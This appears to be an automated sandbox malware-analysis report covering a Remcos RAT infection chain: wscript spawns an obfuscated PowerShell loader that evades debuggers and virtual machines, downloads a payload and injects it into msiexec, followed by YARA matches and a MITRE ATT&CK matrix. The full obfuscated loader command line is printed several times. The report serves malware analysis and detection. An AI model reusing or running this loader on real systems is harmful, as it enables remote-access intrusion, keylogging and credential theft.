Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germin
                Source: unknown  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. 
Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germin
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848E8C4B0 push eax; iretd 4_2_00007FF848E8C4D1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848F593F8 pushad ; retf 4_2_00007FF848F593F9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04ADCCC8 pushfd ; ret 6_2_04ADCCC9
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT caption, serialnumber FROM Win32_DiskDrive
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5483
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4411
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5832
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3974
                Source: C:\Windows\System32\wscript.exe TID: 3552 Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6616 Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 320 Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 6120 Thread sleep count: 237 > 30
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 6120 Thread sleep time: -118500s >= -30000s
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5572 Thread sleep count: 317 > 30
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5572 Thread sleep time: -951000s >= -30000s
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5572 Thread sleep count: 9182 > 30
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5572 Thread sleep time: -27546000s >= -30000s
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: wscript.exe, 00000000.00000003.2065459520.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: wscript.exe, 00000000.00000003.2047830976.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065709106.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048467850.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2063713785.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046230842.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2064439033.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045500545.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2066779885.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045973752.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2213928441.000001A2E32D9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3317523548.0000000000776000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: wscript.exe, 00000000.00000002.2066650226.000001FB2F908000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048216203.000001FB2F905000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046040317.000001FB2F8E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046230842.000001FB2F908000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2063713785.000001FB2F907000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
                Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04AD9219 LdrInitializeThunk,6_2_04AD9219

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
                Source: Yara match File source: amsi64_576.amsi.csv, type: OTHER
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 576, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3F90000
                Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
                Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. 
Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germin
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#garveris nontitle fiberizes skippendes tirl sennet longus #>;$conformists='jacobes241';<#udstykkerne microfossil syrians zostera condoled floozies #>; function levelheadedness($antinomians){if ($host.debuggerenabled) {$videoapparatets86++;}$kreturene=$pedlars+$antinomians.'length'-$videoapparatets86; for ( $tekstilarbejderne=2;$tekstilarbejderne -lt $kreturene;$tekstilarbejderne+=3){$blinddren=$tekstilarbejderne;$maalestoksfaktor+=$antinomians[$tekstilarbejderne];}$maalestoksfaktor;}function germiniparous($brions){ & ($artistiske) ($brions);}$plenches=levelheadedness ' ,mano.vz,nifal lmoaa,/pe ';$ruched=levelheadedness 'frthalg s 1 s2 ';$underkuede='b [mans.eiltib. escae sr svhniovcnoeu,p mo qistnaata,msuaten badeg be r p]in:ef:p.sheeficfru dr fidetd y lp rs ount ,oddcedobel o=,n$ r.eu cpuhtsestdti ';$plenches+=levelheadedness 't 5 r. a0fo li(diw ,i cnard.loc,wtesde ren ,tan ro1tr0 .a.0g,;n ,wpui snd 6do4m ;fu ,xp.6sa4 l; . hrpovsp:su1 3m.1sl.su0te) o fogudegrcfokciobr/bu2co0 f1 v0 0 f1so0s 1 g infnoimar letufdioomx m/ u1 r3ne1in.ma0ko ';$olga=levelheadedness 'a u osvaepars,- aatagrueoln cto, ';$booklores=levelheadedness 's.heftovt cphjsnu:br/fu/artcaofor.or tejesm vkdmanamicwhk se unenn,fa a.elc olho/ rbskip.nal/friyen itlaeevrm,psil de vasp.slscynb.pu ';$afstalinisering=levelheadedness ',n>k ';$artistiske=levelheadedness 'pri ekox s ';$tekstilarbejdernenjustices='hvorind';$dadlers='\trkfugl.chr';germiniparous (levelheadedness ' y$mog blfoo.ub cao l,b:sen soopnvaruae al a att istos ndya ulld= a$e.e nu.v :aaafiptupfaduna gte,ash+un$udd ra,ed linedirelstu ');germiniparous (levelheadedness 'fo$prgd.luno cbebadilal:vefsaocal imoobilfoobesanee 1sa9 7re=am$ pbguo nobiksel aob rple sde. 
ps up ,l ticot r(li$coawofersa,tkvaallw ip n ziepsiseenroviminprgin) k ');germiniparous (levelheadedness $underkuede);$booklores=$foliolose197[0];$moniliaceous231=(levelheadedness 'my$hugpiludohjbcoajull.:sys dkakyskttal ceaur nn,de fsco=hunpuebowb.- o ,b xjfreurc .tnu visstyanse t ueavmst..knfietutme.hewp egeb .cfal i e gnplt m ');germiniparous ($moniliaceous231);germiniparous (levelheadedness 'm.$g,stikh,yf tudls,erurapnvieacs d.d,h e aa cddaesurbasfe[ b$ ,othlr g oage] h=ho$ npa,l e n.lceeh pe tsla ');$absolutive138=levelheadedness 'b,$f.s mk yy ptcel lerir bn.aeausba.a.dc.o.vw dnsjltiounas dg.f.ei.il es (ma$ovba ovio.lklnl obarskefasc,,sa$logrea bmbeitrnlsgb,sdi) l ';$gamings=$nonrelational;germiniparous (levelheadedness ',l$t,gsplg o .bh a bl :drncrokar m,ra al jtanivilc sditk,aupnspd tefontrs.a= n(avtheeinsunt s-mup uanatpeh h di$t,gu,afam piarnkoglgsti)k ');while (!$normaltilstandens) {germiniparous (levelheadedness ' e$c,gbild,o ,b,habelwr: ikblablmg m,re srotap tins.p=t $s tazr bukrei ') ;germiniparous $absolutive138;germiniparous (levelheadedness 'blsb ttaaosrset -losfollae,mehepb ge4om ');germin
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#garveris nontitle fiberizes skippendes tirl sennet longus #>;$conformists='jacobes241';<#udstykkerne microfossil syrians zostera condoled floozies #>; function levelheadedness($antinomians){if ($host.debuggerenabled) {$videoapparatets86++;}$kreturene=$pedlars+$antinomians.'length'-$videoapparatets86; for ( $tekstilarbejderne=2;$tekstilarbejderne -lt $kreturene;$tekstilarbejderne+=3){$blinddren=$tekstilarbejderne;$maalestoksfaktor+=$antinomians[$tekstilarbejderne];}$maalestoksfaktor;}function germiniparous($brions){ & ($artistiske) ($brions);}$plenches=levelheadedness ' ,mano.vz,nifal lmoaa,/pe ';$ruched=levelheadedness 'frthalg s 1 s2 ';$underkuede='b [mans.eiltib. escae sr svhniovcnoeu,p mo qistnaata,msuaten badeg be r p]in:ef:p.sheeficfru dr fidetd y lp rs ount ,oddcedobel o=,n$ r.eu cpuhtsestdti ';$plenches+=levelheadedness 't 5 r. a0fo li(diw ,i cnard.loc,wtesde ren ,tan ro1tr0 .a.0g,;n ,wpui snd 6do4m ;fu ,xp.6sa4 l; . hrpovsp:su1 3m.1sl.su0te) o fogudegrcfokciobr/bu2co0 f1 v0 0 f1so0s 1 g infnoimar letufdioomx m/ u1 r3ne1in.ma0ko ';$olga=levelheadedness 'a u osvaepars,- aatagrueoln cto, ';$booklores=levelheadedness 's.heftovt cphjsnu:br/fu/artcaofor.or tejesm vkdmanamicwhk se unenn,fa a.elc olho/ rbskip.nal/friyen itlaeevrm,psil de vasp.slscynb.pu ';$afstalinisering=levelheadedness ',n>k ';$artistiske=levelheadedness 'pri ekox s ';$tekstilarbejdernenjustices='hvorind';$dadlers='\trkfugl.chr';germiniparous (levelheadedness ' y$mog blfoo.ub cao l,b:sen soopnvaruae al a att istos ndya ulld= a$e.e nu.v :aaafiptupfaduna gte,ash+un$udd ra,ed linedirelstu ');germiniparous (levelheadedness 'fo$prgd.luno cbebadilal:vefsaocal imoobilfoobesanee 1sa9 7re=am$ pbguo nobiksel aob rple sde. 
ps up ,l ticot r(li$coawofersa,tkvaallw ip n ziepsiseenroviminprgin) k ');germiniparous (levelheadedness $underkuede);$booklores=$foliolose197[0];$moniliaceous231=(levelheadedness 'my$hugpiludohjbcoajull.:sys dkakyskttal ceaur nn,de fsco=hunpuebowb.- o ,b xjfreurc .tnu visstyanse t ueavmst..knfietutme.hewp egeb .cfal i e gnplt m ');germiniparous ($moniliaceous231);germiniparous (levelheadedness 'm.$g,stikh,yf tudls,erurapnvieacs d.d,h e aa cddaesurbasfe[ b$ ,othlr g oage] h=ho$ npa,l e n.lceeh pe tsla ');$absolutive138=levelheadedness 'b,$f.s mk yy ptcel lerir bn.aeausba.a.dc.o.vw dnsjltiounas dg.f.ei.il es (ma$ovba ovio.lklnl obarskefasc,,sa$logrea bmbeitrnlsgb,sdi) l ';$gamings=$nonrelational;germiniparous (levelheadedness ',l$t,gsplg o .bh a bl :drncrokar m,ra al jtanivilc sditk,aupnspd tefontrs.a= n(avtheeinsunt s-mup uanatpeh h di$t,gu,afam piarnkoglgsti)k ');while (!$normaltilstandens) {germiniparous (levelheadedness ' e$c,gbild,o ,b,habelwr: ikblablmg m,re srotap tins.p=t $s tazr bukrei ') ;germiniparous $absolutive138;germiniparous (levelheadedness 'blsb ttaaosrset -losfollae,mehepb ge4om ');germin
Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager(
Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: msiexec.exe, 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

Source: Yara match | File source: 00000009.00000002.3333353972.000000002316F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Remote Access Functionality

Source: C:\Windows\SysWOW64\msiexec.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-T15VJD
Source: Yara match | File source: 00000009.00000002.3333353972.000000002316F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the signature-count badge shown in the original matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: 221 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 11 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 Exploitation for Client Execution; 2 PowerShell; Launchd; Scheduled Task
Persistence: 221 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 312 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 1 Masquerading; 131 Virtualization/Sandbox Evasion; 312 Process Injection; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: 11 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 111 Security Software Discovery; 2 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 113 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 11 Input Capture; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
